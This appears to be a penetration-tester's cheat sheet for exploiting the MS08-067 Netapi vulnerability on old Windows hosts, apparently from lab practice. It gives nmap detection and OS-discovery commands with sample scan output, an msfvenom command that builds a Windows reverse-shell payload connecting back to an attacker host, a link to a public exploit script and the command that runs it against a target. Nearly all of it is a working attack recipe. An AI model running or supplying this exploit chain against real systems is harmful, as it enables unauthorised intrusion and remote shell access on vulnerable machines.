# MS08-67 - Netapi

Detecting it,

```
sudo nmap --script=smb-vuln-ms08-067 10.3.3.7
```

Generating reverse shell payload

```
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

Detecting target version 

```
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.3.3.7
```

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 00:20 +03
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227 (10.11.1.227)
Host is up (0.13s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_2000::-
|   Computer name: jd
|   NetBIOS computer name: JD\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-02-26T23:20:47+02:00

Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
```

Exploiting it,

* <https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py>

```
python2 ms08-067.py 10.3.3.7 2 139
```

please note that 2 is obtained from above